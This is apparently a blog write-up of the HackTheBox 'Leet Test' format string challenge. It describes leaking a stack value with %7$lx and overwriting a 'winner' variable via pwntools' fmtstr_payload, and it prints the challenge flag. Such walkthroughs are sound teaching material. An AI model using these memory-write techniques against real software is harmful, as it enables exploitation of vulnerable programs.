Format String Vulnerability Explained

Table of Contents

We covered a binary vulnerable to format string vulnerability in which the vulnerable code contains an implementation of printf statement that takes the user input directly as an argument without input filtering or validation. This leads the attacker to submit format string specifiers such as %x, %n or %p to leak or even modify values on the stack.. This was part of HackTheBox Leet Test Intro to Binary Exploitation track.

Initial Analysis

I start by examining the provided binary file (lead_test) using checksec. I discover that there’s no Canary and Position Independent Executable (PIE) is disabled. This is good because it means memory addresses won’t be randomized, making it easier to leak them. However, NX (Non-executable stack) is enabled, meaning I can’t directly execute code on the stack. Since PIE is disabled, I won’t need to create complex ROP (Return-Oriented Programming) chains.

Code Review with Ghidra

I then analyze the binary’s main function using Ghidra. I notice a line of code that generates a random value using /dev/urandom and stores it in a local variable (local_13c) after performing an AND operation with FFFF. The program enters a while loop, prompting the user for their name using fgets. The input buffer (local_128) is 280 bytes, and the allowed input is 256 bytes, so there’s no buffer overflow at this stage. The vulnerability lies in the subsequent printf statement: printf("hello %s", local_128). Because local_128 is user-controlled and directly used as the format string in printf, this creates a format string vulnerability.

Understanding Format String Vulnerabilities

I briefly explain that a format string vulnerability occurs when user-supplied input is evaluated as a command by the application (in this case, by printf). This can allow an attacker to execute code, read from the stack, or cause a crash. The goal is to make printf interpret our input as commands.

Exploitation Strategy

The program has a condition to print the flag: if a randomly generated value multiplied by another value equals “winner” (which is CAFEBABE in hex), the loop breaks, and the flag is displayed. Since the random value is unpredictable, I need to leverage the format string vulnerability to control the value of “winner” or bypass this check. My plan is to:

Find the offset of the random value on the stack.
Use the format string vulnerability to write a desired value to the “winner” variable’s memory location.

I explain that format string parameters like %x (read data from stack), %s (read strings), and %n (write an integer to memory) will be crucial.

Finding Offsets and Addresses

Input Control Offset: I experiment by inputting sequences of %x and observe the output to find where my input starts appearing on the stack. I determine that the offset where I can control the input is 10.
Winner Address: Using GDB, I disassemble the main function and identify the memory address of the “winner” variable.
Random Value Offset: I set a breakpoint in GDB just before the multiplication involving the random value. By examining the RAX register (which holds the random value before multiplication) and the stack pointer (RSP), I identify the random value on the stack. I then experiment with inputs like %6$lx and %7$lx to leak values from specific stack offsets. I find that %7$lx successfully leaks the random value.

Crafting the Exploit with Pwntools

I use the pwntools library in Python to automate the exploit. The exploit script will:

Send %7$lx to leak the random value from the application.
Receive and decode this leaked random value.
Calculate the controller value. This is done by taking the leaked random value, multiplying it by the constant 0x1337c0de (from the binary’s logic), and then performing an AND operation with 0xffffffff (similar to the FFFF in the binary, but for a 4-byte value). This ensures the calculated value will match what the program expects for “winner”.
Construct a payload using pwntools‘ fmtstr_payload. This function takes:
- The input control offset (10).
- A dictionary mapping the address of “winner” to the calculated controller value. This tells pwntools to write the controller value to the “winner” address.
Send this payload to the application.

Success

By running the Python exploit script, I successfully overwrite the “winner” variable, bypass the conditional check, and retrieve the flag.

Technical Commands

Here are the technical commands shown being typed into the terminal:

LS (likely ls to list files)
check SEC lead_test (likely checksec lead_test)
./lead_test
%x
%x.%x.%x...
%s
%s%s
PX (likely meant %p or %x)
MX (likely meant %x)
LX (likely meant %lx for long hex)
percentage 10 dollar LX (meaning %10$lx)
GDB -Q lead_test (likely gdb -q ./lead_test)
disassemble main
b *main+221
run
XI R IP (likely x/i $rip)
p x/x $eax (likely p/x $eax)
x/20gx $rsp
percentage 6 dollar LX (meaning %6$lx)
percentage 7 dollar LX (meaning %7$lx)
clear
python3 exploit (likely python3 exploit.py)

Fully working exploit script can be found here

Flag

HTB{y0u_sur3_r_1337_en0ugh!!}

Video Walkthrough

Buffer Overflow, CTF Writeups, HackTheBox Leet Test, HackTheBox Walkthrough

Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles

Format String Vulnerability Explained | HackTheBox Leet Test